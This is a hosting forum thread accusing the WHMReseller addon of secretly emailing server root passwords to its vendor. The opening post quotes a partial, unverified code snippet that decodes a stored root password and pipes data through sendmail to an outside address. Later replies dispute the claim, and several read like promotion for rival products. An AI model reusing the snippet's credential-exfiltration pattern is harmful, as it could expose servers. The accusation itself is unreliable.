WHMReseller users, Your Server's ROOT Password is not SAFE!

Hiya

First of all, What I am going to disclose here is not a fake statement.

One of my chat friend told me that he was able to decode WHMReseller software owned by deasoft.com which is used for creating master resellers.

I don't know how did he get it, but first I thought that it was just fake comment. Then I asked proof and he gave me proof surprising me!

After chatting with him and discussing about this long time, we found that the servers running WHMReseller is not safe.

WHMReseller will decode the server root password and send that password to which is operated by Brett Deason.


And
When I asked proof, he gave me this sample code of whmreseller script

Filename: versionupdate

save_debug();
//Get server root password
sprintf(datafile, "%ssrdatafile.txt", PRIDIR);
get_data(datafile, 'f', 0);
decode(datafile);
gnf("serverrootpass=", " ", datafile, serverrootpass, 2);
randomise_decode(serverrootpass);
decode(serverrootpass);




		//If not found then create one now
		sprintf(temp3, "%ssrmarker", PRIDIR);
		strcpy(temp4, "WHMreseller debug marker filenPlease do not removen");
		put_data(temp3, temp4);
		//Get actual instances
		sprintf(temp5, "echo ps -aux | grep curl");
		get_data(temp5, 'p', 0);
		//Email deasoft with ps -aux output
        	gnf("sendmail=", " ", datafile, sendmail, 2);
        	sprintf(temp3, "%s sales@deasoft.com", sendmail);
        	pi=popen(temp3, "w");
        	fprintf(pi, "Subject: %sn", "WHMreseller Bug Detected");
        	fprintf(pi, "From: nonen");
        	fprintf(pi, "Reply-To: nonen");
        	fprintf(pi, "n");
		sprintf(temp3, "ps -aux Output:nn%snnMore Detail:n", temp2);
        	fputs(temp3, pi);
		fputs(temp5, pi);
        	pclose(pi);
		stop=1;
		}

Code (markup):

Its a bit of the c++ codes, and not the full file.

So just to let you EVERY SERVER'S root passwords are with DEASOFT BRETT DEASON and if he think then he can root all the servers!

 

stop spreading exploits idiot !

 

deasoft is the worst software ever made for master reseller's and now new bottom line added for security lol !!

 

... And that is why I don't use/Sell Master Resellers.

 

master reseller softwares are unreliable to begin with, you can't just put the blame on one server - and most master resellers only stay in business for a little while before they make their short term profit then bounce - ugly..

 

Can somebody else confirm this ?

 

Normally I would not believe something without more proof but knowing the type of company Deasoft is I can only wish the best of luck to everyone running their software. A very great reliable master reseller software I have used is Zamfoo. From when I first installed it on my server I noticed a great decrease in server cpu that was being used up but what simply blew me away was the toolset they offer. I do not know how much longer Whmreseller will continue to run but if you guys are looking for a good, safe, and secure master reseller software I would recommend Zamfoo.

 

I Second that!
I have been offering Master Reseller's since May 2008 and have always felt like Deasoft's Software was worthless junk from the start.
Around a 2 weeks ago I switched to Zamfoo and I don't regret it at all.
Zamfoo's support team has been good to me always willing to help and the switch went over easier then I expected.

-Chris

 

Hmm, i might switch, as my WHMReseller is VERY BUGGY, it has been for 2 of my servers and it destroyed reseller/master reseller rights for my NL server and i had to add everyone manually again.

 

There were already some security issues with whmreseller. But actually I didnt think that brett will send the server root password to his email id

Well, I can not support you. There are lot of hosts including me , selling master reseller since years. In my case, I am selling it since 2 years.
I also used WHMReseller , because there was no alternative.

But as I said before, I didn't know that we are just jokers and whmreseller is sending our root passwords to brett deason.

Thank God I made my own master reseller software called WHMResellerPHP (www.whmphp.com) and switched to whmphp from whmreseller.

Definitely, we have had lot of issues like deletion of master rights, and even reseller rights from our servers beacuse of whmreseller. Thats why I switched to whmphp


Regards

 

hi,

its nice to hear the love coming back. as a direct competitor i guess i lose by saying this but maybe my intelligence will compell people to switch software vendors based on the intelligence level of the designers behind the scenes.

.......however/whatever/whoever....... what i am about to say is actually what i perceive, until other wise shown conclusive proof that someone has superman like computer powers, to be the truth, the whole truth so help me god.
-----------------------
in converting people to my software, i have seen an aweful lot of nasty unrecoverable data loss on deasoft's client's machines(sorry about the double possessive). i mean completely wiped out scrambled up garbage with absolutely no way to recover it what so ever.....complete trajedy. this is most likely a sham started by someone that is very very very very angry.

here are the reasons why:
point 1:
client confidence. what does he gain unless he intentionally wants to screw people on his exit from the master reseller software market. stuff would show up in a virus scan. you could screen your mail logs. which in turn asks the question....why email the password. that is way to obvious. what if you saw your password going through your mail system.....why not drop it to a file and ftp it? laziness.....no. he already has ftp code. its copy and paste to do that. you can check your mail stats.....

point 2:
it is compiled code. you can't reverse that. the only thing you can do is chop it down to byte assembly and reconstruct it. who hear has extremely intriquit knowledge of assembly.....? anyone....anyone? who the hell has the time to do that....? it would take forever. not only that it is probably all garbage speghetti code which is why it doesn't work right....never did work right ....and never will work right. why would you want to dissassemble compile garbage that is worthless....to fix it? why not just make it all over again. it has been much easier for me than trying to do "the impossible".

point 3:
whm stores the password as a hash. you would have to have a rainbow table or have intriquit knowledge on how to reverse a password. again that would require accessing a section of the OS that would be scanned by a virus scanner. this comes directly from cpanel conversations when trying to make the login to whm function. any matching is done fowardly by comparing hashes....not reversing a password and checking it.

point 4:
where is the nulled version? it would be all over the internet like wild fire. it is no where to be found. why only a section of the code released? with all of the pent up anger and aggression why not swing the axe at the neck?
release the thing if you have it. even i want to see how much ragu parmasean and meatballs are in that code.....

point 5:
i see calls to functions that the code is not shown. this would be the heart of where the password decryption takes place....again which can't happen without a monster ....i take that back, an impossible sized rainbow table to crack. if you are going to release code that proves something.....do it. don't show function calls to stuff are the heart of your point and not provide the whole point you are trying to make.

point 6:
he is an idiot. do you think he could possibly figure out how to decode a hashed password? id bet a years salary that says he can't.

point 7:
that data file he is supposedly shown pulling the root password out of is whmreseller data file...not a hash storing location or a whm/cpanel file. maybe its deasofts root password...or maybe the whole thing is just plain made up and that is the only data file that is plausible for storing a root password in...in this story.... because you can't read it and it has the word data in it.

ok...so i made the previous 7 points on a whim after thinking about it for approximately 5 minutes while i drank a beer and wrote some code......BUT......i challenge any one to proooooove beyond a reasonable doubt that what he is claiming here is the truth.

as a side note, im a gambler. does anyone care to bet on it???

again thanks for the props on the my script.

thanks,
kevin

 

Man you people will believe just about anything. I just scanned a whole server for anything that could send an email, his script never came up, it's a fake storry. Plus use some logic people:

1. If he sent every root password to his email he would have almost 23,000,000 emails to date according to their site.

2. The lies you hear about WHMReseller being horrible are false, I have NEVER EVER had a problem with it and I run it on 12 servers at this very moment and manage 6 servers additionally with it on there.

3. They may have slow support, but I swear installing their addon couldn't get much easier. It's done in less than 2 minutes on a good server.

You gotta love people trying to make a dent in the world and make money, but come on there are much better ways to do it. Example: If you think your addon is that great prove it, offer to give it away for 3 months. At that rate, people would be running to try it, after the three months if it's as good as you claim, then people are going to pay for it.

I'll bet with hostydotnet on this one. He's right and i'm right...

 

Lolz, I am also loving to get answers for the above questions from the poster.

Let me see how he is trying to prove it

 

hi,

go buy a lottery ticket. you win. you are probably the only person without a SINGLE complaint.

kevin

 

Probably, but it's bound to happen eventually. I just don't see any REAL reason to change yet...

 

hi,

awesome. good luck with it. i hope everything continues to work for you. one quick question though. which website is yours. i don't see you selling master reseller accounts on any of your sig links?

nevermind i see it now.

kevin

 

hostydotnet, you asshole, mind your own business?

I already told that its not a fake statement.

The person who gave me this code, is behind the scene , is not just a fool. Me too either.

I am publishing it after verifying 100% that the codes he gave me

I don't know it is not possible to decode the executable file, but then I think that the Brett's pc was hacked or his website. ( his site now clearly gives me this point , see their site, they dont have any single page alive other than the home page)


moneydude, I confirmed this.

hostydotnet and qualityhostings, both are the owner of similar software, so mind your own business ?
I am not talking about your softwares, so its better you both keep mum.


Asus-Games ; stay with whmreseller and you will see how clients leave you because of the bugs in whmreseller.

And yes, its source codes were out now.

hostynet , I don't think it is hard to release a nulled version of whmreseller, but you fool, it is going to affect you only.

Attaching the screenshots as well as sample codes I received from him for the proof

 

hi,

i am minding my business. this is my business. i want to see it to. im not worried about that code. its not detrimental to me. i could care less if it is out there. im not calling you a liar. im asking you to prove your statements. its that simple.

as a side note. i know approximately....not exactly of couse...approximately 34 times more about how the software works than you. i see images of files that you can't tell what is in them. i see incomplete code snippets with comments about deasoft that only show the most common possible file inclusions that can be done.....in notepad as you so clearly show.

im not calling you a liar. im not saying that the source hasn't been hacked off of his local machine. i said you can't null it....which is true. its impossible. i am also telling you 100% for a fact that he is not obtaining any server root passwords without going un-noticed or putting forth a tremendous effort. let me pose a scenario. he logs into ssh and you get an email saying he logged in...then what. how many times will that work before people start noticing its him?

just the your money where the mouth is and produce it. produce the raw code.....its that easy. or produce the person with the raw code.

if its out there....then where. provide a link...something....anything. anything other than meaningless screen shots that can't be stuffed through a cpu. we are all waiting. anxiously. waiting.

thanks,
kevin

 

hosty and coolstuff,
I believe you both have some points. As far as I know, the c++ executable files can not be decoded. So the only chance is , the source codes are hacked off from deasoft's server. And I believe brett is just a fool if he uploaded all the source codes without any password protection. So hosty you're correct here.

If the first post's code is correct, then I assume, WHMReseller is sending the root password to brett, only if WHMReseller encounter a bug when versionupdate executes.

What I believe is, Brett receives passwords of every servers, because there are lot of bugs with whmreseller and if it is sending mails when it see a bug, then probably brett will receive a thousand emails.

As far as I know, he is the only one there to take care of the hosting service as well as software. And as everyone know, he don't have time even for fixing the bugs in whmreseller and giving support for whmreseller.

That could be why he didn't check every server, even though he receives the bug report.

But it is absolutely wrong to send the server root password without the server owner's permission. But the real fact is that, we can not see the the codes of the executable file, whether it is sending the root password or not.

So, the final comment will be of Brett himself., he need to check this codes and comment here about its ownership. But I am 100% sure he is not going to agree this. Because it is absolutely illegal and he and his company which is registered with au government ( I assume ) can be sued because of this.

So the best way is to avoid using such c++ software which can read files directly from the servers file system and send mails to the creator



I respect the work Brett has done ( the good work ) . Although we make similar product and are competing, I request coolstuff to , do not post any codes that you may know or paste screenshots of whmreseller codes, even though some people like hostydotnet are very much interested to see it and compelling you to do so.


Thank you

 

I third that!

We switched to Zamfoo weeks ago and it has good features. It does not use a lot of memory or cpu. Their support is extremely fast and awesome, they seriously pwn support. Zamfoo loads much faster than deasoft and zamfoo comes with b9 tool set, which is a tool that installs programs which you can select:


There is also the magic wand tool where you can fix stuff magically:


Zamfoo has definitely won the master reseller software game and I would rate them 100/100!